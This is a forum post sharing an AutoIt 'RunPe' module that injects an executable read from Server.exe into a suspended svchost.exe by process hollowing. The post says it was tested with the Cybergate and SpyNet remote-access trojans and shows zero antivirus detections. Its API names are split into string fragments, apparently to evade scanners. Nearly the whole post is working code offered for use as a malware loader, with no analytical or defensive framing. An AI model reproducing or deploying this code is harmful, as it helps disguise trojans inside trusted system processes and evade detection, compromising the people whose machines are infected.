Jump to content
ka0z

[AutoIt] RunPe Module by M3

Recommended Posts

Posted

RunExeFromMemory ( Base Function )

Author : M3

Credits : trancexx (trancexx at yahoo dot com) RunExeFromMemory Base

Tested on Cybergate \ SpyNet on WIN_XP , WIN_VISTA , WIN_7_32


;==============================================================================
; RunExeFromMemory ( Base Function )
; Author : M3
; Credits : trancexx (trancexx at yahoo dot com) RunExeFromMemory Base
; Tested on Cybergate \ SpyNet on WIN_XP , WIN_VISTA , WIN_7_32
; Detections : 0 | 35 http://scanner.udtools.net/reporte.php?id=m3py_ubxG
;==============================================================================

#include<WINAPI.au3>
#include <[Includes]\_ThreadContext.au3>



RunBinaryInMemory(FileRead(@DesktopDir & "\Server.exe" ) )



Func RunBinaryInMemory($bBinaryImage)


Global $sNTDLL = "ntdll"

Global $sKernel32 = "kernel32"

Global $sEbx = "Ebx"

Global $sValue = 0x00400000


Local $pPointer , $tSTARTUPINFO , $tPROCESS_INFORMATION ,$hProcess , $hThread , $tCONTEXT , $tIMAGE_DOS_HEADER , $tIMAGE_NT_SIGNATURE , _
$tIMAGE_FILE_HEADER , $iNumberOfSections , $iEntryPointNEW , $pOptionalHeaderImageBaseNEW , $iOptionalHeaderSizeOfImageNEW , $pHEADERS_NEW , _
$tIMAGE_SECTION_HEADER, $sCONTEXT , $iSizeOfRawData, $pPointerToRawData, $iVirtualAddress ,$tInput , $iRunFlag , $CONTEXT_FUL


$tInput = DllStructCreate("Boolean[" & sReadBytes($bBinaryImage) & "]")

DllStructSetData($tInput, 1, $bBinaryImage)

$pPointer = DllStructGetPtr($tInput)

$tSTARTUPINFO = DllStructCreate("dword cbSize;ptr Reserved;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;dword YCountChars;dword FillAttribute;dword Flags;ushort ShowWindow;ushort Reserved2;ptr Reserved2;ptr hStdInput;ptr hStdOutput;ptr hStdError")

$tPROCESS_INFORMATION = DllStructCreate("ptr Process;ptr Thread;dword ProcessId;dword ThreadId")

_WinAPI_CreateProcess(@SystemDir & "\svchost.exe", 0 , 0 , 0 , 0 , 4 , 0 , 0 , DllStructGetPtr($tSTARTUPINFO), DllStructGetPtr($tPROCESS_INFORMATION))

$hProcess = DllStructGetData($tPROCESS_INFORMATION, "Process")

$hThread = DllStructGetData($tPROCESS_INFORMATION, "Thread")

$tCONTEXT = DllStructCreate("dword ContextFlags;dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;dword SegGs; dword SegFs; dword SegEs; dword SegDs;dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;byte ExtendedRegisters[512]")

$iRunFlag = 1

Switch $iRunFlag

Case 1
$CONTEXT_FULL = 0x10007

Case 2
$CONTEXT_FULL = 0x100007

Case 3
$CONTEXT_FULL = 0x80027

EndSwitch

DllStructSetData($tCONTEXT, "ContextFlags", $CONTEXT_FULL)

DllCall($sNTDLL, "int", "NtGetContextThread", "ptr", $hThread, "ptr", DllStructGetPtr($tCONTEXT))

$tIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];ushort BytesOnLastPage;ushort Pages;ushort Relocations;ushort SizeofHeader;ushort MinimumExtra;ushort MaximumExtra;ushort SS;ushort SP;ushort Checksum;ushort IP;ushort CS;ushort Relocation;ushort Overlay;char Reserved[8];ushort OEMIdentifier;ushort OEMInformation;char Reserved2[20];dword AddressOfNewExeHeader", $pPointer)

$pPointer += DllStructGetData($tIMAGE_DOS_HEADER, "AddressOfNewExeHeader")

$tIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $pPointer)

$pPointer += 4

$tIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;ushort NumberOfSections;dword TimeDateStamp;dword PointerToSymbolTable;dword NumberOfSymbols;ushort SizeOfOptionalHeader;ushort Characteristics", $pPointer)

$iNumberOfSections = DllStructGetData($tIMAGE_FILE_HEADER, "NumberOfSections")

$pPointer += 20

$tIMAGE_OPTIONAL_HEADER = DllStructCreate("word Magic;byte MajorLinkerVersion;byte MinorLinkerVersion;dword SizeOfCode;dword SizeOfInitializedData;dword SizeOfUninitializedData;dword AddressOfEntryPoint;dword BaseOfCode;dword BaseOfData;dword ImageBase;dword SectionAlignment;dword FileAlignment;word MajorOperatingSystemVersion;word MinorOperatingSystemVersion;word MajorImageVersion;word MinorImageVersion;word MajorSubsystemVersion;word MinorSubsystemVersion;dword Win32VersionValue;dword SizeOfImage;dword SizeOfHeaders;dword CheckSum;word Subsystem;word DllCharacteristics;dword SizeOfStackReserve;dword SizeOfStackCommit;dword SizeOfHeapReserve;dword SizeOfHeapCommit;dword LoaderFlags;dword NumberOfRvaAndSizes" ,$pPointer)

$pPointer += 96

$iEntryPointNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint")

$pPointer += 128

$pOptionalHeaderImageBaseNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "ImageBase")

$iOptionalHeaderSizeOfImageNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfImage")

$sCONTEXT = DllStructGetData($tCONTEXT, $sEbx) + 8

$hBaseAddress = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "ImageBaseAddress")

_NtWriteVirtualMemory( $hProcess, $sCONTEXT , $pOptionalHeaderImageBaseNEW, 4, 0)

_sUnmapViewOfSection($hProcess, $hBaseAddress)

_VirtualAllocEx ( $hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW)

$pHEADERS_NEW = DllStructGetPtr($tIMAGE_DOS_HEADER)

$iOptionalHeaderSizeOfHeadersNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfHeaders")

_ProcessMemoryWrite ( $hProcess, $sValue, $pHEADERS_NEW, $iOptionalHeaderSizeOfHeadersNEW)



For $i = 1 To $iNumberOfSections

$tIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];dword UnionOfVirtualSizeAndPhysicalAddress;dword VirtualAddress;dword SizeOfRawData;dword PointerToRawData;dword PointerToRelocations;dword PointerToLinenumbers;ushort NumberOfRelocations;ushort NumberOfLinenumbers;dword Characteristics", $pPointer)

$iSizeOfRawData = DllStructGetData($tIMAGE_SECTION_HEADER, "SizeOfRawData")

$pPointerToRawData = DllStructGetPtr($tIMAGE_DOS_HEADER) + DllStructGetData($tIMAGE_SECTION_HEADER, "PointerToRawData")

$iVirtualAddress = DllStructGetData($tIMAGE_SECTION_HEADER, "VirtualAddress")

_ProcessMemoryWrite( $hProcess, $sValue + $iVirtualAddress, $pPointerToRawData, $iSizeOfRawData)

$pPointer += 40

Next


DllStructSetData($tCONTEXT, "Eax", $sValue + $iEntryPointNEW)

_ThreadSetContext ($hThread, $tCONTEXT)

_ThreadResume($hThread)


EndFunc






Func sReadBytes($Data)

Local $Value = BinaryLen($Data)
Return $Value

EndFunc




Func _sUnmapViewOfSection($hProcess, $pAddress)

$sRet = DllCall($sNTDLL, "int", "NtUnmap" & "ViewOfSection", "ptr", $hProcess, "ptr", $pAddress)
return $sRet

EndFunc




Func _VirtualAllocEx($hProcess, $pAddress, $iSize)

$aCall = DllCall($sKernel32, "ptr", "Virtual" & "AllocEx", "handle", $hProcess, "ptr", $pAddress, "dword_ptr", $iSize, "dword", 0x3000,"dword", 64)

Return $aCall

EndFunc



Func _NtWriteVirtualMemory($hProcess, $lpBaseAddress, $lpBuffer, $nSize, $lpNumberOfBytesWritten)

Local $Return

$Return = DllCall($sNTDLL, "int", "NtWrite" & "VirtualMemory", "int", $hProcess, "ptr", $lpBaseAddress, "ptr*", $lpBuffer, "int", $nSize, "int", $lpNumberOfBytesWritten)

Return $Return

EndFunc

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...